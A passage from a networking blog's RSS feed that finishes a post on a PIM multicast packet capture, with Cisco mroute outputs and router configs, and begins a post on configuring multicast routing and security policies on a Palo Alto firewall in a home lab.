<li>I left only the beginning of the actual H.264 streams in there to keep the file as small as possible. (Can you decode them? ;))</li>
<li>Neither IGMP (for IPv4) nor MLD (for IPv6) is interesting in this capture, as I captured between the two routers R1 and R2 rather than on the source or destination subnet of the multicast stream. Hence, we&#8217;re merely looking at PIM here.</li>
<li>I don&#8217;t know why there&#8217;s PIMv1 traffic in there, since PIMv2 is the default at all.</li>
<li>For IPv4, there are some unrelated PIM joins in there, as the clients requested some other multicast groups as well.</li>
<li>Concerning IPv6, there&#8217;s a lot of ICMPv6 traffic in the capture, which relates to RS/RA, NS/NA, and MLD. I left them within the trace, as I left ARP for IPv4 there as well.</li>
</ul>
<h2>Wiresharking</h2>
<p><strong>Please download the <a href="https://weberblog.net/the-ultimate-pcap/">UltimatePCAP</a> by yourself in order to have a closer look at all those packets and sessions.</strong> The following screenshots give a rough overview, though.</p>
<p>5x for legacy IP, 5x for IPv6:</p>

<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-01-Hello.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-01-Hello-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-02-Register.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-02-Register-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-03-Register-stop.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-03-Register-stop-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-04-Join.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-04-Join-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-05-Prune.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-05-Prune-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-01-Hello.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-01-Hello-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-02-Register.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-02-Register-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-03-Register-stop.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-03-Register-stop-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-04-Join.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-04-Join-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-05-Prune.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Wireshark-PIM-IPv6-05-Prune-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>

<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<h2>Shows &amp; Configurations</h2>
<p>Here are some <strong>multicast routing table outputs during the tests</strong>, all taken from <strong>R1</strong>:</p>
<p>As the stream started, but nobody was listening yet:</p><pre class="urvanov-syntax-highlighter-plain-tag">R1#show ip mroute

(*, 239.23.11.10), 00:00:25/stopped, RP 10.0.0.1, flags: SP
Incoming interface: Null, RPF nbr 0.0.0.0
Outgoing interface list: Null

(192.168.124.12, 239.23.11.10), 00:00:25/00:02:34, flags: P
Incoming interface: FastEthernet0/1, RPF nbr 10.23.0.2
Outgoing interface list: Null</pre><p>
Client 1 listens to the stream:</p><pre class="urvanov-syntax-highlighter-plain-tag">R1#show ip mroute

(*, 239.23.11.10), 00:03:46/00:03:17, RP 10.0.0.1, flags: S
  Incoming interface: Null, RPF nbr 0.0.0.0
  Outgoing interface list:
    FastEthernet0/0, Forward/Sparse, 00:00:16/00:03:17

(192.168.124.12, 239.23.11.10), 00:03:46/00:01:13, flags: T
  Incoming interface: FastEthernet0/1, RPF nbr 10.23.0.2
  Outgoing interface list:
    FastEthernet0/0, Forward/Sparse, 00:00:16/00:03:17</pre><p>
Stream was not present anymore, client 2 requested it:</p><pre class="urvanov-syntax-highlighter-plain-tag">R1#show ip mroute

(*, 239.23.11.10), 00:00:38/00:03:27, RP 10.0.0.1, flags: S
  Incoming interface: Null, RPF nbr 0.0.0.0
  Outgoing interface list:
    FastEthernet0/0, Forward/Sparse, 00:00:38/00:03:27</pre><p>
Same for <strong>IPv6</strong>: Stream started, no one listening yet:</p><pre class="urvanov-syntax-highlighter-plain-tag">R1#show ipv6 mroute

(2A00:6020:AD0B:83C1:E37:DC1D:6FB8:B0DC, FF05::2311), 00:00:09/00:03:20, flags: SP
  Incoming interface: FastEthernet0/1
  RPF nbr: FE80::21A:6CFF:FEA1:2B98
  Outgoing interface list: Null</pre><p>
Client 3 listens to the stream:</p><pre class="urvanov-syntax-highlighter-plain-tag">R1#show ipv6 mroute

(*, FF05::2311), 00:00:37/never, RP 2A00:6020:AD0B:8399::1, flags: SCJ
  Incoming interface: Tunnel1
  RPF nbr: 2A00:6020:AD0B:8399::1
  Immediate Outgoing interface list:
    FastEthernet0/0, Forward, 00:00:37/never

(2A00:6020:AD0B:83C1:E37:DC1D:6FB8:B0DC, FF05::2311), 00:03:14/00:03:01, flags: SJT
  Incoming interface: FastEthernet0/1
  RPF nbr: FE80::21A:6CFF:FEA1:2B98
  Inherited Outgoing interface list:
    FastEthernet0/0, Forward, 00:00:37/never</pre><p>
Stream not present anymore, client 3 requesting it nevertheless:</p><pre class="urvanov-syntax-highlighter-plain-tag">R1#show ipv6 mroute

(*, FF05::2311), 00:00:02/never, RP 2A00:6020:AD0B:8399::1, flags: SCJ
  Incoming interface: Tunnel1
  RPF nbr: 2A00:6020:AD0B:8399::1
  Immediate Outgoing interface list:
    FastEthernet0/0, Forward, 00:00:02/never</pre><p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetroo-data-diode" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketRoo.1208x232.webp" /></a></div>
<p>For the sake of completeness, here are the configuration commands related to IP routing and multicast for both routers:</p><pre class="urvanov-syntax-highlighter-plain-tag">############
R1
############
ip cef
ip multicast-routing
ipv6 unicast-routing
ipv6 cef
ipv6 multicast-routing
!
interface Loopback0
 ip address 10.0.0.1 255.255.255.255
 ipv6 address 2A00:6020:AD0B:8399::1/128
!
interface FastEthernet0/0
 description Switch-gi1/0/39
 ip address 192.168.3.99 255.255.255.0
 ip pim sparse-mode
 ip ospf authentication message-digest
 ip ospf message-digest-key 1 md5 7 0331783E321E13567A053D170D175C3837
 ipv6 address 2A00:6020:AD0B:8303::99/64
 ipv6 ospf 6 area 0.0.0.0
 ipv6 ospf authentication ipsec spi 305419896 sha1 7 0327785F572B711B6B51415C35472F5A557A0D050D646D074B5F335B59750C0D0A715A563C47090A06
 bfd interval 999 min_rx 999 multiplier 3
!
interface FastEthernet0/1
 description Switch-gi1/0/40
 ip address 10.23.0.1 255.255.255.0
 ip pim sparse-mode
 ip ospf authentication message-digest
 ip ospf message-digest-key 1 md5 7 1422313E38151831102417273816502230
 ipv6 address 2A00:6020:AD0B:83C0::1/64
 ipv6 ospf 6 area 0.0.0.0
 bfd interval 999 min_rx 999 multiplier 3
!
router ospf 1
 router-id 10.0.0.1
 redistribute connected subnets
 network 10.23.0.0 0.0.0.255 area 0.0.0.0
 network 192.168.3.0 0.0.0.255 area 0.0.0.0
 bfd all-interfaces
!
ip pim rp-address 10.0.0.1
!
ipv6 pim rp-address 2A00:6020:AD0B:8399::1
ipv6 router ospf 6
 router-id 10.0.0.1
 bfd all-interfaces
 redistribute connected
!

############
R2
############
ip cef
ip multicast-routing
ipv6 unicast-routing
ipv6 cef
ipv6 multicast-routing
!
interface Loopback0
 ip address 10.0.0.2 255.255.255.255
 ipv6 address 2A00:6020:AD0B:8399::2/128
!
interface FastEthernet0/0
 description Switch-gi1/0/41
 ip address 10.23.0.2 255.255.255.0
 ip pim sparse-mode
 ip ospf authentication message-digest
 ip ospf message-digest-key 1 md5 7 133034273F1D36301F280C212F27443325
 ipv6 address 2A00:6020:AD0B:83C0::2/64
 ipv6 nd ra suppress all
 ipv6 ospf 6 area 0.0.0.0
 bfd interval 999 min_rx 999 multiplier 3
!
interface FastEthernet0/1
 description Switch-gi1/0/42
 no ip address
!
interface FastEthernet0/1.124
 description R2-Netz1
 encapsulation dot1Q 124
 ip address 192.168.124.1 255.255.255.0
 ip pim sparse-mode
 ipv6 address 2A00:6020:AD0B:83C1::1/64
!
interface FastEthernet0/1.125
 description R2-Netz2
 encapsulation dot1Q 125
 ip address 192.168.125.1 255.255.255.0
 ip pim sparse-mode
 ipv6 address 2A00:6020:AD0B:83C2::1/64
!
router ospf 1
 router-id 10.0.0.2
 redistribute connected subnets
 network 10.23.0.0 0.0.0.255 area 0.0.0.0
 bfd all-interfaces
!
ip pim rp-address 10.0.0.1
!
ipv6 pim rp-address 2A00:6020:AD0B:8399::1
ipv6 router ospf 6
 router-id 10.0.0.2
 bfd all-interfaces
 redistribute connected
!</pre><p>
&nbsp;</p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@cdd20?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">愚木混株 Yumu</a> on <a href="https://unsplash.com/photos/a-group-of-red-arrows-on-a-black-surface-HQH-GOZ6K2c?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/protocol-independent-multicast-pim-capture/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14023</post-id>	</item>
		<item>
		<title>Multicast Routing w/ Palo</title>
		<link>https://weberblog.net/multicast-routing-w-palo/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=multicast-routing-w-palo</link>
					<comments>https://weberblog.net/multicast-routing-w-palo/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Thu, 05 Mar 2026 14:47:19 +0000</pubDate>
				<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[Routing]]></category>
		<category><![CDATA[IGMP]]></category>
		<category><![CDATA[Multicast]]></category>
		<category><![CDATA[PIM]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14037</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />A rare use case on a Palo (at least from my point of view): Multicast Routing. And it can become as complex as you want. Fortunately, the basics are relatively easy to configure, at least if you have a rough understanding of multicast and routing with PIM and IGMP. (Recommended YouTube session here.) Let&#8217;s have &#8230; <a href="https://weberblog.net/multicast-routing-w-palo/" class="more-link">Continue reading <span class="screen-reader-text">Multicast Routing w/ Palo</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>A rare use case on a Palo (at least from my point of view): <strong>Multicast Routing</strong>. And it can become as complex as you want. Fortunately, the basics are relatively easy to configure, at least if you have a rough understanding of multicast and routing with PIM and IGMP. (<a href="https://www.youtube.com/watch?v=UEmmEMzPn6Q" target="_blank" rel="noopener">Recommended YouTube session here.</a>) Let&#8217;s have a look at the <strong>common configuration</strong> steps on PAN-OS, the needed <strong>security policies</strong> to the special destination zone type of &#8220;multicast&#8221;, as well as some <strong>&#8220;show&#8221; outputs</strong> that can be used for troubleshooting:</p>
<p><span id="more-14037"></span></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetlion-aggregation-packet-broker" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketLion.1208x232.webp" /></a></div>
<h2>The Lab</h2>
<ul>
<li>My lab consists of 3x Cisco routers (2811, IOS Version 15.1(4)M12a) and 1x PA-440 &#8220;pa-lab&#8221; with <strong>PAN-OS 11.1.10-h1</strong>, ARE enabled, hence: logical routers.</li>
<li>(Note that with <a href="https://docs.paloaltonetworks.com/pan-os/11-2/pan-os-release-notes/limitations/limitations-in-pan-os-11-2" target="_blank" rel="noopener">PAN-OS 11.2 and ARE, multicast routing is not supported at all</a>.)</li>
<li><strong>PIM-SM (sparse-mode)</strong> is used all over the lab. The rendezvous point (RP) is statically configured on R1&#8217;s loopback interface.</li>
<li>Since Palo only supports legacy IP (IPv4) with multicast, IPv6 is not of interest in this setup. 😢</li>
<li>A Raspberry Pi on the right-hand side offers a multicast stream at 239.23.11.10:1234. Accomplished by: 
			<span id="urvanov-syntax-highlighter-6a78d868a39bf816229824" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">ffmpeg -f lavfi -re -i "testsrc=size=640x360:rate=25:decimals=2" -c:v libx264 -f mpegts "udp://239.23.11.10:1234?pkt_size=1316"</span></span>.</li>
<li>The Palo serves a client subnet directly (VLAN 51, client 1 aka receiver, <strong>IGMP</strong>), and is additionally connected to another &#8220;internal&#8221; router (R3, <strong>PIM</strong>), in which another receiver (client 2) resides.</li>
</ul>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-Lab-70.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14073" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-Lab-70-1024x549.png" alt="" width="604" height="324" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-Lab-70-1024x549.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-Lab-70-300x161.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-Lab-70-768x412.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-w-Palo-Lab-70-1536x823.png 1536w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<h2>The Config</h2>
<p>The following screenshots provide an overview of the multicast settings needed for this kind of setup. Almost all settings were left at their defaults.</p>

<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-01-enable-multicast-protocol.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-01-enable-multicast-protocol-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-02-PIM.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-02-PIM-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-03-PIM-Interfaces.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-03-PIM-Interfaces-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-04-PIM-Rendezvous-Point.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-04-PIM-Rendezvous-Point-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-05-IGMP.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-05-IGMP-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>

<p>Special attention needs to be paid to the <strong>security policies</strong>:</p>
<ul>
<li>Allowing &#8220;<strong>pim</strong>&#8221; is only necessary if another router must communicate with the RP *through* the Palo, or if the Palo itself provides the RP. If the Palo is only terminating receivers (IGMP), there&#8217;s no PIM policy needed. (I&#8217;m not fully sure why, since for other routing protocols such as OSPF or BGP, those allow rules are a must. Yes, I&#8217;ve checked an explicit intrazone-deny rule as well. Still no hits.)</li>
<li><strong>IGMP</strong> must be allowed from the receiver&#8217;s zone to the special &#8220;<strong>multicast</strong>&#8221; destination zone. Of course, destination address objects can be used to further restrict the traffic.</li>
<li>For the actual <strong>multicast traffic</strong>, in my case, a video stream on UDP port 1234, a policy has to allow this type of traffic <strong>from the multicast source</strong> (in my case: zone &#8220;transfer&#8221;) <strong>to the special &#8220;multicast&#8221; destination zone</strong>.</li>
</ul>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Policies-Palo-Alto-1x.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14201" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Policies-Palo-Alto-1x-1024x443.png" alt="" width="604" height="261" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Policies-Palo-Alto-1x-1024x443.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Policies-Palo-Alto-1x-300x130.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Policies-Palo-Alto-1x-768x333.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Policies-Palo-Alto-1x.png 1307w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-06-Security-Policies.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14081" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-06-Security-Policies-1024x245.png" alt="" width="604" height="145" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-06-Security-Policies-1024x245.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-06-Security-Policies-300x72.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-06-Security-Policies-768x184.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-06-Security-Policies-1536x368.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-06-Security-Policies.png 1862w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-07-Security-Policies-multicast-destination-zone.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14082" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-07-Security-Policies-multicast-destination-zone-1024x394.png" alt="" width="604" height="232" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-07-Security-Policies-multicast-destination-zone-1024x394.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-07-Security-Policies-multicast-destination-zone-300x116.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-07-Security-Policies-multicast-destination-zone-768x296.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-07-Security-Policies-multicast-destination-zone.png 1353w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packethawk-inline-bypass-network-tap" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketHawk.1208x232.webp" /></a></div>
<h2>The Show</h2>
<p>The following screenshots and CLI outputs were taken while both receivers were consuming the stream. (Using the VLC media player with 
			<span id="urvanov-syntax-highlighter-6a78d868a39c3519632345" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">udp://@239.23.11.10:1234</span></span>.)</p>

<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-08-Multicast-FIB.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-08-Multicast-FIB-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-09-Multicast-IGMP-Interface.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-09-Multicast-IGMP-Interface-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-10-Multicast-IGMP-Membership.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-10-Multicast-IGMP-Membership-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-11-Multicast-PIM-Group-Mapping.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-11-Multicast-PIM-Group-Mapping-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-12-Multicast-PIM-Interface.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-12-Multicast-PIM-Interface-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>
<a href='https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-13-Multicast-PIM-Neighbour.png'><img loading="lazy" decoding="async" width="150" height="150" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-13-Multicast-PIM-Neighbour-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" /></a>

<p><strong>Session Browser</strong> during the stream: (the IGMP session was already gone)</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-14-Session-Browser.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14090" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-14-Session-Browser-1024x184.png" alt="" width="604" height="109" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-14-Session-Browser-1024x184.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-14-Session-Browser-300x54.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-14-Session-Browser-768x138.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-14-Session-Browser-1536x275.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-14-Session-Browser.png 2014w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p><strong>Traffic Log</strong> *after* the receivers stopped consuming the stream:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-15-Traffic-Log.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14091" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-15-Traffic-Log-1024x147.png" alt="" width="604" height="87" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-15-Traffic-Log-1024x147.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-15-Traffic-Log-300x43.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-15-Traffic-Log-768x110.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-15-Traffic-Log-1536x221.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-15-Traffic-Log.png 1782w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Traffic Log for &#8220;pim&#8221;, in which router R3 contacted the RP:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-16-Traffic-Log-PIM.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14098" src="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-16-Traffic-Log-PIM-1024x243.png" alt="" width="604" height="143" srcset="https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-16-Traffic-Log-PIM-1024x243.png 1024w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-16-Traffic-Log-PIM-300x71.png 300w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-16-Traffic-Log-PIM-768x183.png 768w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-16-Traffic-Log-PIM-1536x365.png 1536w, https://weberblog.net/wp-content/uploads/2025/12/Multicast-Routing-Palo-16-Traffic-Log-PIM.png 1939w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Almost the same via the CLI show commands. One note, though: <strong>The 
			<span id="urvanov-syntax-highlighter-6a78d868a39c6934588886" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline  crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">show advanced-routing multicast pim state</span></span> command is the only one that gives an output comparable to that from the Cisco world. E.g., only this one lists the Rendezvous Point for the (*,G) groups.</strong></p><pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@pa-lab&gt; show advanced-routing multicast pim neighbor

Logical router: default

Interface                               Neighbor                 Uptime    Holdtime  Generation ID       DR Pri
ethernet1/1                             192.168.3.99             44:59:56  00:01:26  1170265741          1
ethernet1/5.131                         10.23.1.2                44:59:56  00:01:44  3086112133          1


weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt; show advanced-routing multicast igmp membership group 239.23.11.10

Logical router: default

Interface                               Address             Group               Source              Mode      Timer          Src  V    Uptime    Static
ethernet1/5.51                          192.168.51.1        239.23.11.10        *                   EXCLUDE   00:02:15       1    3    00:10:35  False
Total (Interface, Groups): 1


weberjoh@pa-lab&gt;
